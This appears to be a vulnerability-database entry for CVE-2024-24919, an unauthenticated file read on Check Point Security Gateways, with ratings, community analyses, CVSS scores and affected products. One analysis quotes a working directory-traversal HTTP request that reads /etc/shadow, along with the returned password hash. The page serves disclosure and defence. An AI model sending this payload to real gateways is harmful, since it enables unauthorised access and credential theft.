Attacker Value
Very High
(2 users assessed)
Exploitability
Very High
(2 users assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
6

CVE-2024-24919

Disclosure Date: May 28, 2024
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available.

Add Assessment

3
Ratings
Technical Analysis

On May 28, 2024, Check Point published an advisory for an unauthenticated information disclosure vulnerability affecting Check Point Security Gateway devices configured with either the “IPSec VPN” or “Mobile Access” software blade. This vulnerability was stated as being a vulnerability impacting devices with password-only authentication enabled on some accounts. However, upon analysis, CVE-2024-24919 was discovered to be an unauthenticated arbitrary file read as root. Though attackers may steal credential files to crack account password hashes, CVE-2024-24919 also impacts systems that are not configured for password-only authentication.

This vulnerability should be urgently addressed by anyone running a Check Point Security Gateway with the IPSec VPN or Mobile Access blades enabled. Additionally, organizations should reference the Rapid7 blog post for this vulnerability for remediation and detection recommendations. As of May 30, 2024, CVE-2024-24919 has been added to CISA’s KEV catalog.

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

This is trivial to exploit. The vulnerability at its core is a directory traversal vulnerability that allows for full access to files on the Check Point VPN device/service. It also appears that this an unauthenticated vulnerability and given that these servers will by their very nature be publicly exposed, significantly increases the risk of this vulnerability.

Exploit

The exploit itself, as mentioned above is trivial to exploit. An example is shown on https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/:

Request

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

Response

HTTP/1.0 200 OK
Date: Thu, 30 May 2024 01:38:29 GMT
Server: Check Point SVN foundation
Content-Type: text/html
X-UA-Compatible: IE=EmulateIE7
Connection: close
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 505

admin:$6$rounds=10000$N2We3dls$xVq34E9omWI6CJfTXf.4tO51T8Y1zy2K9MzJ9zv.jOjD9wNxG7TBlQ65j992Ovs.jDo1V9zmPzbct5PiR5aJm0:19872:0:99999:8:::
monitor:*:19872:0:99999:8:::
root:*:19872:0:99999:7:::
nobody:*:19872:0:99999:7:::
postfix:*:19872:0:99999:7:::
rpm:!!:19872:0:99999:7:::
shutdown:*:19872:0:99999:7:::
pcap:!!:19872:0:99999:7:::
halt:*:19872:0:99999:7:::
cp_postgres:*:19872:0:99999:7:::
cpep_user:*:19872:0:99999:7:::
vcsa:!!:19872:0:99999:7:::
_nonlocl:*:19872:0:99999:7:::
sshd:*:19872:0:99999:7:::

Using this, an attacker would be able to gain access to sensitive data on the server, such as the configuration for the VPN service.

CVSS V3 Severity and Metrics
Base Score:
8.6 High
Impact Score:
4
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Changed
Confidentiality (C):
High
Integrity (I):
None
Availability (A):
None

General Information

Vendors

  • checkpoint

Products

  • cloudguard network security r80.40,
  • cloudguard network security r81.0,
  • cloudguard network security r81.10,
  • cloudguard network security r81.20,
  • quantum security gateway firmware r80.40,
  • quantum security gateway firmware r81.0,
  • quantum security gateway firmware r81.10,
  • quantum security gateway firmware r81.20,
  • quantum spark firmware r80.20,
  • quantum spark firmware r81.10

Exploited in the Wild

Reported by:

Additional Info

Technical Analysis